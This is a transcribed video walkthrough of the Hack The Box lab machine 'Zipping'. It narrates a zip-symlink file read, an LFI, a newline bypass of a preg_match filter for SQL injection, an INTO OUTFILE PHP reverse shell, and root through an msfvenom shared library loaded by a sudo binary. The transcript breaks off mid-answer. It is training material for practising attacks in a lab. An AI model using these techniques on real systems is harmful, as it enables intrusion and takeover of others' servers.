Hello everyone, welcome back to another video. So in today's video we are solving the zipping. As you guys can see, I have already got the flag for user, but system crashed. Same story again. I don't know why this always happened to me whenever I record. So let's go to Kali. We are already in Kali, so let's start with the box. Before we start, let me show you the stuff which we got. Not city, but let's get the nmap results. You will see that we have two ports open, the 22 and port 80. As port 80 is running, so there might be some endpoints that we'll be leveraging. So let's get the disk search too, because I have already performed the directory search. So there is some good endpoints like upload.php, then there is product.php. Let's clear this, open the browser. Let's access the zipping.htb. There we go. Over here you will see the shop and work with us. On shop, it will take us to the shop endpoint where we can buy the products, and work with us, it will take us to the upload page. This is where we have to upload the PDF file in zip file. So if we go here, we can look on Google if there is any vulnerability related to zip file upload. So let's try zip. Yeah, there we go, zip upload. So there is a zip slip vulnerability, I see. Let's check if there is any hack trick. I see there we have, and over here, if I remember correctly, it was in zip tar file. Yes, this is the one. So you can see over here, if you can upload a zip file that is going to be decompressed inside the server, you can do two things. Symlink, upload a link containing soft links to other files, then accessing the decompressed file, you will access the linked file. So like if you link text file with the PHP file, when you open this, it will automatically open this file too, the index.php. So we are just creating the chain with single click. We don't have to open files one by one. It will automatically create a chain for us and open a file which is we have mentioned after this. So let's create a payload with this, or exploitable file. For this, we will be exploiting the etc password file first. So let's do ln, and there we have the command. We'll create test.pdf. Let me check if it's already there. Yeah, it's already there. And the next one is zip. So using this command, it will create a zip file. I'm not clicking it again because I already have it. There we go. Let's clear this, and we have pub suite running along with the browser. Next. Okay, so let's proxy this. Now we'll upload the file and see the result if it serves any purpose. We'll check in flow, and we can put this into the scope. We don't see out of the scope results. I hope I didn't took the full URL. Yeah, this area took the full URL. Let's clear this, and this we need only zipping. Cancel. We'll remove this advanced scope. Add, and there we have re-enable scope only in scope. Okay, so we have uploaded the file. As you can see, there is some content over here, and we have etc password file over here. So let's try accessing the uploaded file. Okay, this is weird, maybe because I gave it too much time to open. Let's upload it back. We'll open it once again, and tada, we have the output. Let's check the output in file, and there we have it. We got the root. There is a bin think and w data manager, and there we have it, the user, which is Reketsu, and it's also running the SQL, MySQL, which is non-existent. This don't have any the specific route of user. Okay, so let's check further what we can do. I guess if we do this, it will take more time. So rather than doing this, we can create a script out of it. So let's craft a script. With this, we do vi and req.sh request.sha. So in this, we will create a script which will automatically pull the data or do the steps. We just have to provide the file name which we want, of which we want the data. So let's start crafting the script. We'll start with the bash. Okay, insert bin/bash. Next, we'll define the target. Let's do that. define the target. With this, the target is going to be zipping.htb. Next, we'll be defining the point where we'll be providing the directories of which we want data. So let's use the provided directory as dir. So if I do dir is equal to $1, so whatever argument we will provide in after running the /request req.sha, whatever path we will provide, it will fetch data from that file. And next we need to clean up the process, so we'll run clean up existing files. For that we'll do rm-rf and test.pdf and test.save. So it will remove both of these files every time we run. And now we are going to run the symbolic chain. So we are going to create symbolic link and zip file. With this we'll put the commands ln-s, and over there we will declare the dir, which will be declaring in the argument, and we'll be putting that in test.pdf. Then we'll zip that file. We'll do it quietly. So with the symlinks, so now we will give it the name tests.zip, because we have to match this name and this name. So next time it will run cleanup, it can remove the identified file, and we'll put test.pdf in it. Now where the real fun come, we'll be uploading the data. So let's on the browser and put it here and inspect. Let's start writing create we will be uploading upload a zip file to the target server. So for that we'll use curl -s and then -x. This is going to be the post command. As we can see over here, this was a post request, so we are going to use that. Okay, so where were we? Yeah, so we was declaring the request type, which is going to be the post, as I've already shown you in the bub suite. So next we'll declare the headers, although I'm not sure if we even need the headers, but we'll still add that. Okay, so header, let's add this cookie header now in double quotes. There we go. Next we need to declare the field over here. If we check on the browser, we need this field first. What's the name of this field? It's a zip file where it's accepting the .zip. So let's add the field over here and double quotes over here. Zip file is equal to, it's going to be, there is a capital F in this. It's going to be equal to the file we have created. So we'll put at test.zip and quote is already closed. Another field which is going to be the submit one or the upload one, and the button name is submit. Okay, let's not here. We will submit, in double quotes, submit is equal to going to be submit. Next we'll give it the URL http:// it's going to be target, so we'll put $target, then upload.php, the page we are accessing, and from there we will extract the output into .php. So this is going to upload the file. Next we need a page which will extract and display the result. So let's extract and display the results. We will use URL is equal to $. We'll be looking for this. It's an href. So first we'll look into the file we have downloaded, the output file. So let's get output.php. In this we will pipe and grep -o href, which is going to be equal to double quotes. It's upload.php or upload // sign. There we go. So this will take any type of extension to upload the file, and with this we'll close this. Next we will seed it, where we will work with the extra content s/a space href equal to double quotes. In these double quotes we will do /, then another seed, there another s. Okay, so we didn't close this one. From here / double quotes, again / is single quote. This is it. In the next line we will curl the request and we'll just print the result. http $target $URL. So this script is gonna take the directory path and gonna convert it into zip upload the file and extract the result and display to us. So we don't have to go to browser and click it again and again. So let's close this, right, quit, clear, and we'll provide the permissions chmod plus hex request.sha. Now if we run this /etc/ which one, pawswt, or we already have the result of password, let's run home/reketsu. It was the spelling of reketsu, give me a second, if I'm not wrong it was rektsu. Over here we will look for I think user.txt flag and enter this. Okay, we have a problem in script. I guess I didn't close it well, so let's check it back. So let's see what's the problem here. It seems like it was around here somewhere. We are putting URL cat output.php. It's output.php. Then we are grabbing the parameter which is ahref upload. Yes, then we are seeding that. Yes, because of this. I see. Insert over here. We have to delete this. And then else. I guess that was it. Let's save it. Right, quit and run it again. This time we should get a result. Seems we broke it again. We shouldn't be getting this big of a result. Or it seems we are hitting the wrong place. Let's try this with etc/host pawswt. It seems there is problem in the script. Let's check it back. We will rewrite it. Let me quit and cat test. I guess there must be something that I'm missing. href. I see there's uploads. There is going to be s. Sorry. s/. I got it. So that's what I was missing. So let's write and quit. So now if I run it again, it should give us the file, I believe. Yep. And there we go. We fixed the problem in the script. So we got the user flag of the first, and now let's check if we can fetch any other file, if there is any default file settings or something we can look into. Let's check back on the nmap results, and we can see that it's running on Apache server. Let's try and fetch any default setting file from where we can read the stuff. Let's provide the file name. I think it's in etc/apache2. I guess I also have to look into the file system. What's the after file in this? I guess in this file, Apache config. Let's try read this file. What sort of data it has? There is a server root, but this is our system file, not from the zipping server. So let's split it, and we can do clear and perform the cd over here. Next we can do is tree. Total 196 files, out of which we only need config one. Let's try and grab the config one only. /request/etc/apache, then apache to config. Let's read this file. There we go. Let's check what sort of content this holds. Okay, so let's jump further. Let me show you something over here. I have already done quite a research and worked on, so let's close this. I don't want to spoil any fun. So over here, if I'm not wrong, in the technologies I have, there we go, on the Apache. Let's put it like this. So it's on a web server. There should be a file system that I have added. There we go. So let's see what sort of file system we'll be looking into. Let's clear this and this too. Let's check what we can do. This is a main configuration file. Okay, conf available directory for available configuration snippets. Conf enable magic MIME type definition files. Okay, there's a port configuration which we don't need. Directory for available virtual host configuration, and site enable directory for enable virtual host okay, so we will be looking into the available sites and sites available and sites enable. There we might be able to check the endpoints we might be able to access. So over here in our file system, let's go back here, check the sites available. There we have 3 files: default.conf and default SSL and xlico. I don't know how to pronounce that, whatever. So let's look into this file. Then we will putting the site available next to this. Then we will be looking into this file. So this, enter. and see what sort of data this file holds and put it into full screen. Let's fetch it again. There we go. So there's a virtual host, server name example.com. Over here, server admin, webmaster at localhost, and there is a document root which is var www.html. We might be able to read the files in this because this has document root, and the directory I see, we might be able to see this directory too, the uploads. And what else do we have? These are the error logs. Now we can try and attempt to read the files from here. Let's check. We can clear and see if we can read files in this file system, which was var/www.html/index.html. Although it's on our side, our desktop, the same should be on the other server too, the hack the box one or the zipping one. Let's see what we can get in result. I see nothing found, or sorry, it must be index.php rather HTML. There we go. And if we see over here, there's a zipping watch store, so we can at least access the file system on this. Now let's see what other files do we have here. This is a shop, and this should be the product. I see shop index. Let's try and read this file, or maybe we can directly read from here. View source code. It's not showing the PHP code, though the file is in PHP. Let's clear this and go back to index.php and see if this time it will show. It's still not showing. Let's try edit it from here. Remove this, paste this, enter, and there we have it. Let me update my notes, and my system crashed again. Let's open the stuff back. Linux. Over here we need the Chrome and Obsidian, and there we have it. It's running and kicking back. Let's wait for it to start completely. I don't know why it crashed so much, but that's how it is. Let's open the browser back along with the Burp Suite and start our VPN. That's why I told you guys, please subscribe to my channel. Do like the video so I can at least afford a good system where I can create a good walkthroughs. Most of the time what happens, I'm creating walkthrough, and because of system crash my whole files go away and I'm not able to upload those files. So please do subscribe so we can progress further. Thank you. Okay, so let's start the VPN and it should be up, and there we go, it's running. Let's open the terminal back. Everything is clean now. Let's cd into machines, then zipping, and we'll clear this ls. At least we have our script there. And let's check in the Obsidian. We have the changes we made. Okay, so let's proceed further as we have already seen. So here we have our index file of shop, and if we check over here, let's put it into the full screen and clear this, run it back. There we go. So if we see it's starting the session and including function and connect to database using PDO MySQL. So it's using the MySQL over here, and next it's connecting to MySQL. Page is set to home by default, so when the visitor visits, that will be the page they see. Okay, so there's a next logic where they have declared page is equal to is set to page, and if file exists, it will get the page.php and take you to home. So this file will repeatedly call user back to home whenever the function get hit. Let's check the function.php file. I'm not sure if it's in the same index, but let's copy, paste, enter, clear. I think we missed something over here. Include and show requested page. Page is set to home by default, so when the visitor visits, that will be the page they see. So if we look at it, you will see over here the page is set and file exists this dot PHP. So like after looking at this, it's saying that if the file exists and is true, then .php extension is append to the page, then the page get rendered. Otherwise the request will set to home. So this page is a parameter over here. I guess this page is vulnerable to LFI. Sorry, let's try the LFI over here, put it here, and if we hit and put question mark page is equal to double dot slash upload, because that's what we found in this file index, not in index but the Apache. Let's see. Yep, see, it took us to the upload page. So there is a LFI possibility, not just possibility, this LFI exists over here. Let's copy this and highlight this. So let me explain you this one more time. Over here what's going on, like if you check this is it's checking if page parameter is set in the URL. Got it? Then it's checking over here if a file with name specified in the page parameter exists, then it appends .php to value of page to create a file path. Then over here, this is a ternary operation. It's like if the condition is in the parenthesis is true, if it will execute the code before this colon, otherwise it execute the code after the colon, which is this. Then again this get page, if the page parameter is set and corresponding to file extension, this part is getting executed. The value of page is assigned to the page variable, to this, or we should say to this. Then over here you see the separator, or I think I picked the wrong one. It was this one that was doing that job, to check if parameter is set and corresponding the file exists, and this part is getting executed actually and assigning the page value to this variable. Then this colon, this is separates the true or false for this operation. Then this home, if page parameter is no set or corresponding file does not exist, then this part will get executed like I previously said, and it will take the user to home page. And if you see over here, if an attacker in this parameter over here .php, if attacker can control this page parameter, then he or she will be able to perform the LFI. Let me show you how. Like I've already shown you over here, we can perform the LFI. Here we have added the page parameter in the index.php and we're running the upload, and we can see that there is an upload page. So the next thing is, I think we should check the function file, or maybe let's check once more our dir search file. In this we have this products.php. Let's read this file this time and clear the other stuff. We can just clean it here and enter. So if you see this code, this code is pretty fascinating. Oh, I see. So but does not prevent SQL. This is fascinating. Prepare statement and execute, but does not prevent SQL injection. Okay, so this seems to be vulnerable to SQL. Okay, so let's check from here. Check to make sure the ID parameter is specified in the URL. Okay, if the parameter is set, get ID, this will run and fetch the ID, and it will assign that assigned ID to this variable, and then it will go to this filtering user input for letters and special characters over here. So you can see this statement over here. If PREG match, and if there is any of these invalid characters or the ID didn't match, it will take the user to index page. So over here it's just generally checking if any parameter that didn't match in the ID, it will take user to the index page. Next, else if no valid character are detected in the ID or get blocked, then it will execute this portion where it's preparing the statement to execute, but this doesn't prevent SQL injection. So if we see this over here, this one is preparing a SQL statement for selecting product based on their ID, and then over here it's executing that statement. Then fetch the product from the database and return the result as an array. So we have to do something here to bypass this reg match. But let's continue and complete the code reading first. Now after executing it, it's going to fetch the product from database and store it in the product variable over here. If you remember PDO, which it was using to run the MySQL, it's fetching the associated data and assigning it to product. Then there is this next statement, if product, checking if product exists and array is not empty, and if the array is empty and product does not exist, it's going to show this error, product does not exist. So if we go to this page, let's where was that page? Me clear this. There we go. If it's saying that if we directly go to this page, it will throw us an error, and there we go. There was no ID or no content related to array. That's why it's throwing an error, which is no ID provided. And if we read it back as per this exits and no ID provided. We got the same error. So next there is a HTML code, I guess. Yeah, this is HTML code. Over here, if you see that there are parameters defined over here in the span class price, this is to show the price, and this is actually collecting the data in dollars. And over here in the form action, here it's taking input of quantity and then the product ID. Then when we click on the submit, it's going to add it to the cart. So if we go back on the shop and if we close this, there we go. We have the price, we have the quantity, and when we click on add to cart, it's going to perform these actions. And I can show you it here in the flow or over here, not in this. Yes, this post request, there we go. It performed the action on cart, add to cart, and this is a quantity and product ID, both of these parameters. So let's try and find if anything related to this PREG match we can find on internet to bypass this filter or the blacklisted characters. Let's clear this, run it back. This time we'll look on Google. Let's open this, or maybe we can just search here if this has anything related to that. PREG match, enter. Okay, it seems they do have something. Yes, let's read this. PREG match could be used to validate user input if it checks if any word rejects from a blacklist is present on user input, and if it's not, the code can continue its execution. Okay, new line bypass. Okay, so there is a way to bypass this. However, when delimiting the start of regexp, PREG match only check the first line of the user input. Then if somehow you can send the input in several lines, you could be able to bypass this check. Example this. So let's check if this works for us. This has given some scenarios over here. So in the scenario, put 1. Okay, so let's go here, and if I perform something similar to like this, a placeholder order has been placed. Okay, let's go back one more time. There we go. If I place in product ID over here, if I place 1, it should execute. If I play on to test, this should give an error. Yep, or it took us back to the default page. We can't put characters in there, and if I do any special character strict, can't do that too, I see. So as per this, if we try to bypass the check, you could send the value with new line URL encode, which is %0a, or if you can send JSON data, send it in several lines. We can't send JSON because it's not a JSON data which is getting rendered here. So let's copy this, and if we put this in the ID, and after this, if we let's remove this. After this, if I put like test and enter, okay, so this took us to the previous page. If I do this, then put test, enter, it again took us to the previous page. But if you see over here, it is redirecting. So this we can sure if we are putting like this, it is bypassing the filter. But if we are putting something like this and add test after that, it's not bypassing the filter. So I guess if we do something like this and add test, then put 1, product does not exist. But I guess it accepted the request. Yeah, it did accept the request because it didn't took us to home page. Let's see one more thing. If I do this, what will it do? I see it should take us back to this page rather than throwing us to that error page over here and taking us back to the home page. Let's check one more thing. If we enable this, copy this, we can't paste it here. Let's check new line URL encoded URL -c, a comma in a string -0. This one is for space 20, 23 or hash. Let's check over here. I think I have to make a list of these special characters too. Okay, there we have something. %0a for new line. Okay, and %0d for carriage return. What is this? This is new. I see over here if you check /r. So this is a carriage return, sometimes known as carriage return, often shortened to CR, is a control character or mechanism that used to reset a device position to the beginning of line of next. I see. So basically we are putting it back to the beginning, and we are generally just using what Bobsit is using by default. Okay, so let's try this then with the %d, and we can include this in our record in Obsidian over here. So now that we know what we'll be using to bypass this filter, let's tap these requests into the repeater. Let's find the request. Where is it? There we go. I guess this is the one. Yep, this is the one. Let's send it to the repeater. And the next command is going to be this, and send this to repeater 2, because over here we will be putting our SQL injection, and over here we will be reading that file, which will be writing using the SQL injection, because we can perform the LFI over here. So if we can upload the file and read that file might help us to get RC. So let's try that. So let's try and run SQL injection, or maybe the SQL map. Let's try running SQL map sh. Let's open this and pick one of these requests. Let's take this, although we'll be modifying it further. We don't need the second request. We don't have to tamper with the comments, I guess. Space and comments. Level 5 and risk will remain same. We don't need this. Technique. I think technique it can decide by itself. And for this, so over here we will give it a parameter which is going to be placeholder, and we'll copy this whole request, go here, clear the page, and create a new file, vi, and paste the content, insert. We will delete this and put 1 and write and quit. Now we'll start providing the parameters over here, which we'll be exploiting. First we will provide the prefix which we will be using, and those prefixes are %0a and %0d, and for the suffix, which always should end with the number, we are going to provide 1, and we'll put it into double quotes. And it seems we have picked the wrong ID. If I remember correctly, it was in ID parameter rather over here. So there should be a correct request on which I'm skipping. Nah, not this one. I guess because of the... oh, there it is. This is the request. I'm picking the wrong request. Sorry, my bad. vi, paste, insert, paste, escape, right, so right quit. And we'll clear this. Over here, other placeholder, we will be using the ID parameter. And we already know the database, so we'll define the dbms, which is equal to MySQL, and batch will be running, so we can try this command and we can modify it further if we require anything else. So let's run this and see the output. Okay, so what's the problem here? All testable parameters you provided are not represent within the given request data. Well, it should be there. I do cd, cat quest. It's a product ID. I am dumb. Sorry, my bad. It should be a product ID. Let's hear this, paste it back, enter, and we'll wait for the result. Okay, it seems the scan got terminated and failed. I would say there is a fatal error this has found. I guess we have to craft it further. Should I reduce the speed? Let's try that. -time -sec in 1. Let's enter, and it failed again. I guess we are not running it on correct place. Let's try, and rather doing this, we will change the parameter and we'll try with the URL this time, and we'll copy the URL from here and give it this and remove this. And if I click enter, I hope this time it might work. This failed again. I guess this is not how it should be working, or I'm going with the wrong approach. But I think I don't want to waste my time over here. I will try to do it in this way from here. Let's send it to repeater. Now we have the request. We can remove this request. And over here, if I put anything in this parameter, and it didn't work for me, at least. I'm not sure if it works for others, but it didn't work for me. Go on. So in this request, I guess we can try delivering some data, but before that, let's check what sort of privilege do we have to perform the injection. And that I think we got information from the index where where was it, the function.php. Yeah, the function.php. Okay, rather doing this, let's put it into the less, and this might show us, and there we go. But actually we generally don't contain it here, but I found it earlier, but I forgot to show it. So let's copy this content and put it into my notes till here. There we go. So we have the user who is root. So as we are root, we have the permission to read and write the content into MySQL. Let's try it. Okay, so we have the permission. We already know. Do we have anything else over here? Seems like no. Let's exit from here and clear this. If we go here and let's try write a SQL. If we do %0a and put 1, what will it do? 204 found. And if we was using this, again 302 found. But if we perform it on the other request, let's go to flow. There was a index 12, if I'm not wrong, where index ID was something. Let's go back here, and if we trigger this, we'll capture this request and send it to repeater. We can try payload here too. So if we do this, it's %0a 1, we get 200, and if we do this, we get 302. So these both requests kind of working similar. What we are doing just here is we are posting the data, but here we are getting the data. So like we already know that it won't be working because we have to bypass these filters, and we also see that there is no /m for the multiple lines. So this is only checking for the single line. So the sort of payload we can put into the multiple lines after verifying with the hack trick block that we can check. And this is the one which I already shown. So now let's try and finish this by crafting the SQL map, the SQL injection, where we can put quote after that colon. So we will be finishing the previous query if it's still running, or if it's already exit, we don't know. So we'll still going to complete that query. And then we'll start by putting select, and we can do from _base64. So what we will be doing is we'll be providing the payload in the base64 format. So let's go here, and on this we have this. Let's go to terminal and get echo, or just do this base64, paste, put it in quotes, enter. I guess I have to perform echo first, then it will do the base64. There we go. We have a base64 string which will be redirecting to our local system. So let's run the netcat on local, paste, and it's running. Let's take it down a bit, copy, and if we go to the request over here, we'll start taking data from, put it in double quotes, close this. There we go. A base64 payload, another payload. Yeah, this is a injection, but I don't think that will be working. So we have to do one more thing, or rather using from base64 we can use this from here, select, then we will no, I think that was perfect, the one I was doing. Okay, so we can't redo, we can only undo the stuff. Okay, so remove this single quote. We'll be finishing the query from here, select from _base64. Now what we'll do, we'll first encode this, which we already have, and then we will craft another string in which we will be putting this injection or the reverse shell, and it's going to be in PHP. So we'll start from here, .php, or I should be writing it in the serial. Let's write it here, I will fix it later. PHP, so $PHP exec execute, and we will put this string here which is going to execute, and pipe it base64 -decode, then pipe will bash it, or I would say this whole is going to be as a string, sorry, we'll close this here and we'll complete this execution and put it into the completion. So if we copy this, create, and because of URL encoding, we are converting it into base64. So let's do this. So we'll be converting this into base64 too. So we'll put sh over here, copy and go double quotes, the whole string. Let's put the single quote, rather double. There we go. And we will base64 this too. Seems this was a pretty long string, so it broke for some reason. Now we will add this into the injection, which is going to be like this. Let's copy it from here. Let's copy till, or maybe this whole stuff till here, copy and paste. From here we'll start braces, parentheses. In this we'll put double quotes and add this here, which is going into out file, and that out file will go to /var/lib/mysql, because this is the default path for MySQL and we are root here, so we can directly write in there, or we can maybe write it anywhere because we are using the SQL. So but we'll be writing it here and we'll name it like rc.php. Now the fourth step is URL encoded sh, and if we copy this and paste it here, then we will select it. I see. You have to remove this and we will select from here till here. Yeah, I forgot one more thing. We have to put some sort of numeric in the end so it can finish the query or don't get blocked because of the restriction they have put it, and we didn't put the colon in the end, so finish the string. Next we will put --1 to finish or comment out other things, and put 1 the variable they require. So if I select all this and click on URL, okay, so it's as you type. Nope, we'll convert it in URL key characters. There we go, and let's put it here. And if I send this, okay, so we got bad request. Why is that? Your browser sent a request that server could not understand. Server at 127.0.1.1. Okay, and why is that? Is this the problem here? Let's keep this colon like this. No, there is a bad reason. Let's send it back. Let's try this same thing over here in the product ID and see if this works. I guess we was able to write the file, and we select this and put it here and send. We are getting /n for some reason, but we know he was able to write the file here, I guess .p, but we don't want this. We want to run this file and get the reverse shell. Okay, I see. Let's do this one more time, and this time we will put and send. We are still getting /n for some reason. Let's check one thing. Send this and see if we can read this file. Doesn't seem like we are getting any output though, and it's not running the way it should be over here, but it's running perfectly fine here. I guess I have found the mistake over here. It's going to be echo, and we'll put this in. I guess this must be the reason why it's not working. Let's clear everything and rerun the stuff. We'll select. So it's already selected. We'll put it here. Yeah, no. We'll put this here and copy this, paste it here. There we go. We got the new one. Let's take it back. Using this, we will put it here, and next we're gonna copy this and replace this whole string. From selecting here, we're gonna convert it into URL encoding and select here and paste it here. So now if I send it, we got file product does not exist, and if I trigger this time, we should get the RCE, and we still didn't get the RCE. That's odd. Let's try it here. Send it. I'm getting /n. Let's check it why it's giving us new line in capital N. Clear that. We can run MySQL SQL. Okay, can't connect to local server through socket. It's showing MySQL, but let's try MySQL. The com, it's already there, but why is it not running? Let's check it here. I'm not sure if MySQL service is running. Sudo I see. So we wasn't running the service first. Now I have started the service. Now we can run it. Okay, so let's try this payload in our local machine first. So we'll put it from there till here, and we are going to decode it and copy, paste it here, enter. It's giving us OK status. The file already exists. Let it more rmrf. Can't remove the sudo. Now we'll remove. I run this back. There's no warning this time. So if I do like -1 and between this file already exists, enter. Let's try this here. If I do this space and they'll select, will perform the encoding and send it. And send it again. I'm still getting the capital N for some reason. Let me figure it out and I'll continue back from here. It seems I have found the problem. What was the problem here? So you see, if you rewind it a bit back over here, I was putting the double quotes, and after I removed that, I created a new one over here. Let me change this to the new base 64 that I have created, this one. So now I have put it this, and if you see over here, let me pull it up a bit. Now after changing the parameter, I run it and it executed perfectly. So if I now run this one, URL encoded one, and rather running it here, I mean we can run it anywhere or both sides. And if I shoot it now and collapse from here, go here and send it, and we got that idiotic problem back. Maybe because of this. Is it possible? Let's copy it again and paste it back, send it and send it. I don't know why, but it was working perfectly though. Let's copy this one and we'll replace it with this, though I don't find any changes. Paste it here. Now if I select back till here and perform the URL encoding, copy this, paste it and send it. Let's send it again. There we go. Again, same problem. But if I do this over here, file already exists. Remove this, let's run it back. And if I get it, there we are getting the normal output here. I don't know why, but that's how it is. Something is messing up, it seems, or maybe I just refreshed the bar. Let's try one last thing, and that is this. Can try the double quote to single quote. This might change the game when I send it. And there we have it. This was the problem all along, but it's working fine over here. I don't know why. Let's collapse this and exit from here. There we can collapse this. Now we have the access of the Retsu. We can close the browser too, or we'll keep it in background. I think something went wrong with that. So let's start the new session. Let's take it here and send it. I think the server file got deleted. Let's send it again. This is another problem with my system. Maybe this one. No, this one won't work because of the double quotes. We have to put the single quote here. Cancel both. Send again. Okay, it seems like someone requested for the reset. Let me restart my machine. But before we restart, let's convert these into curl. Copy command curl, and we will save it as curl. This one is load shell, and this one is going to execute shell sh. Second one. Okay, so curl paste. I can close everything. Action F12, close. Let me restart the system. Okay, so let's trigger the connection. I've already added the request. Let's send this, and there we go. We got the connection back. So I have created SSH keys over here. Let me show you the zipping and zipping.pub. So we'll be uploading these on the server with the Python. Now we'll use wget here, but we have to go to the SSH folder. So as we already know the path, let's go cd-home, not hyphen but /home over here, riketsu /.ssh. If it exists, it exists. Now we run wget with the IP 10.10.16.7 8000 /zipping.pub, and we'll split it one more time, and we use SSH -I zipping and use username Riketsu. At IP is going to be this. Let's enter. It's asking for password. I don't know why. Let's try and move the file zipping.pub to zipping and close this. If I try again, it's still asking for password. I don't know what's in this file though. Zipping. We have key there, but it's not letting me to connect. I closed the wrong connection. Send it back. Connection is up. Close. Retry. Katsu. Still not letting me in. Let's remove this file. Oh, sorry, we are in wrong. Let's copy this path and cd this. And now if we remove the zipping as well as we can use this rather. Close this, collapse this, cat zipping.pub or maybe cat zipping. It seems we are working with the wrong keys. Let's remove these keys. We'll create a new key with SSH 5 keygen. We need a RSA keys. Let's do that. Where would you like to save the key? This would be the idle place. Okay, do we have already? Let's go to cd/.ssh ls. I don't see any key over here. I would like to write. Enter the phrase. We don't need any phrase. Yes. Saving file failed. Why is that? Yes. Enter. Let's create it here. We're gonna remove all these files. Asterisk. Yes. Let's clear this. And now we'll run SSH keygen. Let's define the bits also. This is getting irritated now. 124 because that's the bit size RSA key used. Next, I guess we can also define the user, which is Riketsu. We don't want anything else. Let's check get Riketsu, get Riketsu.pub, and it's still creating ed, which we don't want. Remove every. Did I made any mistake while creating the key? Let's Google it. How to create RSA key to enable SSH. Let's check it here. Nothing special. I think we have to define the type -t RSA. Enter and enter. Okay, I guess this time we got the RSA key. If we cat this, yeah, this time we have the RSA key. Let's create a key over here with name of the default we use. I think it was authorization key or it was authorized key. Let's do echo and we will put this whole content till here in the file with name authorized underscore keys, if I'm not wrong. Enter and we have created a key. So now if I clear this and try to SSH like this, Riketsu, enter, I should get a reverse shell, not reverse shell but SSH connection, and there we go, we are in. Let's clear this and we'll close this session too. We can collapse this. Next we will just directly go to the document which will not be going there but will run directly from there here, which is sudo. Let's check into the obsidian, the name. This was a path and name. Copy this, paste it here, enter, and now it's asking for password. Looks good. We'll paste the password and there what do we have here? It's to see the stock, edit the stocks. I don't know what I'm doing. Let's exit from here. Like we have already tried it with the strings. We can either use Ghidra or we can try this tool. I think that was a trace. Let's find where it is. There we go. We have trace over here. Let me fix this and trace. These are some common commands. This is just a debugging tool and diagnose tool. So we'll be using this. With trace, we can see the whole conversation or the connection between this whole program. So let's do that. Trace. We'll paste the file path, not the password. It was this file. Paste, enter, and there we go. What do we have here? This is executing this, some mapping going on. It's setting address, robust list, and it's asking for the password. Let's provide the password. There we go. So over here, after providing the password, it's opened Riketsu config. I see. So it's calling this library, which is library counter, but unfortunately this file doesn't exist or this library doesn't exist, but it's calling that. So what we can do is let's close from here. No. I think I break script again. Let's copy the content and add it here. So over here we can use some Google help, but I don't think we'll be leveraging that because if we have the resource, we will use that rather wasting our time on search. Let's clear this. To perform this, what I'll be doing, I will use MSF Venom. Over there is a reverse TCP. Let's do that. For this we'll use MSF, sorry, not here but on our local system we'll be doing that. MSF Venom list payload, and in this we'll be grabbing the reverse TCP. Let's see, because there are many payloads. Okay, so there is a syntax error. Let's try this. -o, or was it -e, or maybe -I? Damn it. Why is it breaking? Let's clear everything. And okay, so it's not the grep problem, but it's MSF Venom's problem. Let's check this error on Google. Open new tab, paste it, enter. Okay, so even they have limited the search string. Let's remove other stuff. Enter. Yeah, this is the same error I'm getting. MSF Venom. Yeah, we are running the correct command. -l and then payloads. Or do we need a sudo for this? So we got the access of file. Now we'll be leveraging MSF Venom. It started working. MSF Venom will list the payloads and grep the reverse TCP underscore TCP and wait for the result, and there we go. We are using the reverse TCP, but we need the Linux one because we are working on the Linux machine. So let's find that. All of these are Windows. There's a Python, Ruby. There we go. We have the Linux one. We are going to use this one as it's going to connect back to the attacker and spawn a command shell for us. So we'll copy this and clear the stuff. Now we craft the command. This is going to be MS Venom, but rather -l will be providing the payload, which is going to be Linux reverse shell, and next lhost, which is going to be RIP 10.10. Oh, I didn't connect the VPN yet. My system crashes so much that even I don't know how many times it has crashed so far, and so many times it has deleted all my recorded files. I'm recording it again and again and again. And for the local port, we'll be running it on the netcat, so 9001-nav also. And for the output, we will name it as per the directory it's running for. This one. No. We'll copy this library counter, paste it here, and enter. If we check ls, we have the file. And next we'll go do SSH again with the zipping, and it's not gonna work here. We have to go to the SSH or just provide the directory /zipping cd into .ssh. Okay, so it's Reketsu, not the zipping. I totally forgot because of restart. And there we go. We got the reverse connection. Damn it. The SSH connection. And now let's check ls-la. Yep, this is a config file over here. We will cd into .conf, clear everything, and we'll run the local server python -m http.server, enter, and download this file wget 10.16.7/libcounter.so, enter. Connection refused. Yep, it's gonna refuse because of the port 1000, and enter. We got the file. Let's clear this, turn this off, clear, and now we'll run netcat over here, enter, and over here we will run this command back. Where did it go? This one with the sudo paste, and let's copy the password and enter. We'll provide the password. I think we should be getting the reverse shell. Okay, break again. Let's check the file. That's weird. We don't have file here. I guess we have to run local server back python -m http.server, enter, and enter here. And as per this, the file has been downloaded. And if I run this after providing the password, we should be getting the reverse shell, but for some reason we didn't get it. Let's try this again, if it's still reading the file or not. Password. Yeah, it's reading the file. Is there any problem with my shell? Let's remove this one and go back. We collapse this because we created it over here. There we go. The command seems to be correct. I think because of lhost, should be lhost. And let's try change it to the 64-bit and enter. We got the new file. Let's upload it. Clear everything. rm, the lib file. Don't we have anything here? Okay, so it's automatically removing the file. Got it. Let's download it back. We got the file. Close this server and run netcat. Next, we'll run the file again and copy the password, paste it here, and there we go. We are root and ls cd root ls, and there we go. We have pawned the box, and this is the root. Thanks for watching, guys. I know it's a bit irritating, but thanks for watching so far. Wait. Although you guys should subscribe, well, it's up to you. But as we are parting, let's try one last thing. As this box has been retired, let's try and put the answers over here. This might work. So as we have our notes prepared, let's keep it here and keep this here. So, and let's collapse this, do it here, and we have to update a bit. over here. We used MSF Venom, Python server. We even created a key, SSH keygen. What else we did? Okay, we'll add it later. Let's answer these first. The port we have, port 22 and port 80. They should accept the answer. Okay, I guess we have to provide the space or without anything. How many ports open? Okay, so there are 2 ports open. What file extension is allowed to work with us page? It's a zip. Nope. Then it must be the PDF, but it should be the zip because it's asking us to upload it there. What's the username of the user that with user ID 001 on zipping? It was Riketsu. Let's copy this, paste here. And the next is, what is the web root directory for the website on zipping? Web root directory. They're asking for the full path for the web root directory. Is it asking for this? Yep. And the next one is, what is the full path to the PHP source file with a clear local file inclusion vulnerability? The file path for that is going to be the upload. This one. What do we have to provide PHP? The file name too. Okay, I see. This is an index page where we have a parameter called page or ID. I think on page it was working. Yeah, it was on page. Okay, so the next is, what is the parameter name that vulnerable to SQL injection? It was ID. And the next one is, which of the following can be used to bypass regex? Okay, it's a new line injection. And the next one is, does the user that website is authenticated to MySQL has the file privilege? Yes, it does has, because we was able to write the file. And the next is, what user is the website running as? I see, so it should be in the function page. Where did it go? Root? Nope. Then zipping, or maybe the Riketsu. Let's check it once. What user is the website running as? I think it should be Riketsu. The website running as. There's only Riketsu I can see, so it should be Riketsu. Yeah, it's Riketsu. And what is the full path of the binary that Riketsu can run with privilege? Sudo root user. Okay, so it's 